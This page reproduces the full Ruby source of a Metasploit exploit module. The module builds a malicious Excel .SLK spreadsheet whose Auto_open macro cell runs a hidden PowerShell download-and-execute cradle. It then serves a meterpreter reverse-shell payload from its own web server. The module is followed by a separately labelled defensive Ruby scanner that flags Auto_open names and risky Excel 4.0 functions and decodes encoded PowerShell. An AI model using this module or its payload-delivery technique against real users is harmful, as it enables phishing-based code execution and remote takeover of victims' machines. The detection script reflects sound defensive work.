Microsoft Excel .SLK Payload Delivery
Posted Feb 12, 2019
Authored by Stan Hegt, Carter Brainerd, Pieter Ceelen | Site metasploit.com

This Metasploit module generates a download-and-execute PowerShell command and embeds it in an .SLK (Symbolic Link) Excel spreadsheet. The SLK file defines an Auto_open name that points at a cell holding the Excel 4.0 macro formula EXEC(), with the PowerShell command as its argument; the module writes the file to disk and also serves it from its own HTTP server for any request URI ending in .slk. When the file is opened, the user is prompted to "Enable Content." Once this is pressed, Excel runs the macro cell, and PowerShell retrieves the second-stage payload over HTTP from the module's web server and executes it.

tags | exploit, web
MD5 | 94d9c996172414156065a8ee4e017837

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => "Microsoft Excel .SLK Payload Delivery",
      'Description' => %Q{
        This module generates a download and execute Powershell
        command to be placed in an .SLK Excel spreadsheet.
        When executed, it will retrieve a payload via HTTP
        from a web server. When the file is opened, the
        user will be prompted to "Enable Content." Once
        this is pressed, the payload will execute.
      },
      'Author' => [
        'Carter Brainerd', # cbrnrd; Metasploit module
        'Stan Hegt',       # @StanHacked; Discovery
        'Pieter Ceelen'    # @ptrpieter; Discovery
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files'],
        ['URL', 'https://www.twitter.com/StanHacked/status/1049047727403937795'],
        ['URL', 'http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen']
      ],
      'Platform' => 'win', # idk about other platforms
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Targets' =>
        [
          ['Microsoft Excel', {} ]
        ],
      'DisclosureDate' => 'Oct 7 2018',
      'DefaultTarget' => 0,
      'Payload' =>
        {
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false,
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
          'EXITFUNC' => 'thread'
        }
    ))

    register_options([
      OptString.new('FILENAME', [true, "Filename to save as", "#{rand_text_alphanumeric 8}.slk"])
    ])
  end

  # Requests whose URI ends in .slk get the spreadsheet itself; any other
  # request gets the second-stage PowerShell payload that the EXEC()'d
  # download cradle fetches and runs in place.
  def on_request_uri(cli, request)
    if request.raw_uri.to_s.end_with? '.slk'
      print_status("Handling request for .slk from #{cli.peerhost}")
      payload = gen_psh("#{get_uri}", "string")
      data = create_slk(payload)
      send_response(cli, data, 'Content-Type' => 'text/plain')
    else
      print_status("Delivering payload to #{cli.peerhost}...")
      p = regenerate_payload(cli)
      data = cmd_psh_payload(p.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
    end
  end

  # I might be able to do without this (using cmd_psh_payload() and encode_final_payload() in Msf::Exploit::Powershell)
  def gen_psh(url, *method)
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl

    if method.include? 'string'
      # In-memory cradle: download the served script and invoke it directly
      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
    else
      # Random filename to use, if there isn't anything set
      random = "#{rand_text_alphanumeric 8}.exe"
      # Set filename (Use random filename if empty)
      filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']

      # Set path (Use %TEMP% if empty)
      path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')

      # Join Path and Filename
      file = %Q(echo (#{path}+'\\#{filename}'))

      # Generate download PowerShell command
      download_string = Rex::Powershell::PshMethods.download_run(url, file)
    end

    download_and_run = "#{ignore_cert}#{download_string}"

    # Generate main PowerShell command
    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
  end

  # Build the SLK (Symbolic Link) text file. SLK is a line-oriented format of
  # semicolon-separated records: ID (header), O (options), NN (defined name),
  # C (cell) and E (end). The NN record binds the name Auto_open to R101C1, so
  # once the user enables content Excel evaluates that cell's Excel 4.0 macro
  # formula, EXEC(), which spawns the PowerShell command; HALT() in the next
  # cell ends the macro.
  def create_slk(cmd)
    content = "ID;P\n"
    content << "O;E\n"
    content << "NN;NAuto_open;ER101C1;KOut Flank;F\n"
    content << "C;X1;Y101;EEXEC(\"#{cmd}\")\n" # Execute command
    content << "C;X1;Y102;EHALT()\n"
    content << "E"
    content
  end

  # Write the .slk to disk (FILENAME); the same content is also served by
  # on_request_uri for URIs ending in .slk.
  def primer
    file_create(create_slk(gen_psh("#{get_uri}", 'string')))
  end
end
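The following is an added example, not code from the module above or from its authors or from Packet Storm. It is a standalone Ruby script that builds an .SLK with the same record layout as create_slk and then reads it back the way a mail gateway or triage script would: splitting each record on its semicolon-delimited fields, flagging an Auto_open or Auto_close defined name and any cell whose formula calls a risky Excel 4.0 function, and decoding a PowerShell -EncodedCommand argument (base64 of UTF-16LE) when one is present. The PowerShell command line is a constructed sample with a harmless script body; its "-nop -w hidden -e <base64>" shape is assumed to match what generate_psh_command_line emits for the options the module passes, and the list of risky XLM functions (EXEC, CALL, REGISTER, RUN, FOPEN, FWRITE) is my own selection, not one the page gives.

```ruby
# Added example: build an .SLK with the same records the module's create_slk
# emits, then parse it back as a defender would and flag the XLM auto-exec chain.
require 'base64'

# Constructed sample (not the module's cradle): a harmless script body, encoded
# the way PowerShell's -EncodedCommand expects (base64 of UTF-16LE).
SAMPLE_SCRIPT = "Write-Host 'slk demo'"

def encode_psh(script)
  Base64.strict_encode64(script.encode('UTF-16LE'))
end

# Assumed command-line shape for generate_psh_command_line(noprofile: true,
# windowstyle: 'hidden', ...): powershell.exe -nop -w hidden -e <base64>.
def sample_command(script = SAMPLE_SCRIPT)
  "powershell.exe -nop -w hidden -e #{encode_psh(script)}"
end

# Same record layout as create_slk: ID header, O options, an NN defined name
# "Auto_open" bound to R101C1, an EXEC() cell there, a HALT() cell, end record.
def build_slk(cmd)
  [
    'ID;P',
    'O;E',
    'NN;NAuto_open;ER101C1;KOut Flank;F',
    "C;X1;Y101;EEXEC(\"#{cmd}\")",
    'C;X1;Y102;EHALT()',
    'E'
  ].join("\n")
end

# Split one SLK record into record type and fields. Fields are ;-separated and
# a literal semicolon inside a field is written as ";;".
def parse_record(line)
  fields = line.gsub(';;', "\u0000").split(';').map { |f| f.tr("\u0000", ';') }
  [fields.shift, fields]
end

# Value of the first field carrying the given one-letter prefix, or nil.
def field(fields, prefix)
  f = fields.find { |v| v.start_with?(prefix) }
  f && f[1..-1]
end

# Excel 4.0 macro functions worth alerting on (my selection, not the page's).
XLM_RISKY = /\b(EXEC|CALL|REGISTER|RUN|FOPEN|FWRITE)\s*\(/i

# Argument of -e / -ec / -enc / -EncodedCommand, decoded; nil when absent or
# not valid base64 UTF-16LE.
def decode_encoded_command(cmd)
  m = cmd.match(/-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+\/=]+)/i)
  return nil unless m
  Base64.strict_decode64(m[1]).force_encoding('UTF-16LE').encode('UTF-8')
rescue ArgumentError, EncodingError
  nil
end

# Walk the records and collect: auto-exec defined names, cells whose formula
# calls a risky XLM function, and any PowerShell script decoded from them.
def scan_slk(data)
  findings = { auto_open: [], risky_cells: [], decoded_commands: [] }
  data.each_line(chomp: true) do |line|
    type, fields = parse_record(line)
    case type
    when 'NN'
      name = field(fields, 'N')
      next unless name && name.match?(/\Aauto_(open|close)/i)
      findings[:auto_open] << { name: name, ref: field(fields, 'E') }
    when 'C'
      formula = field(fields, 'E')
      next unless formula && formula.match?(XLM_RISKY)
      cell = "R#{field(fields, 'Y').to_i}C#{field(fields, 'X').to_i}"
      findings[:risky_cells] << { cell: cell, formula: formula }
      decoded = decode_encoded_command(formula)
      findings[:decoded_commands] << decoded if decoded
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  result = scan_slk(build_slk(sample_command))
  puts "Auto-exec names: #{result[:auto_open].inspect}"
  result[:risky_cells].each { |c| puts "#{c[:cell]}: #{c[:formula]}" }
  result[:decoded_commands].each { |s| puts "Decoded PowerShell: #{s}" }
end
```

The scan keys on two things that have to be present together for the technique to fire: a defined name beginning with Auto_open (or Auto_close) and a formula cell calling a process-spawning XLM function. Matching on either alone produces false positives on legitimate macro workbooks, so report both and let the decoded -EncodedCommand text decide severity.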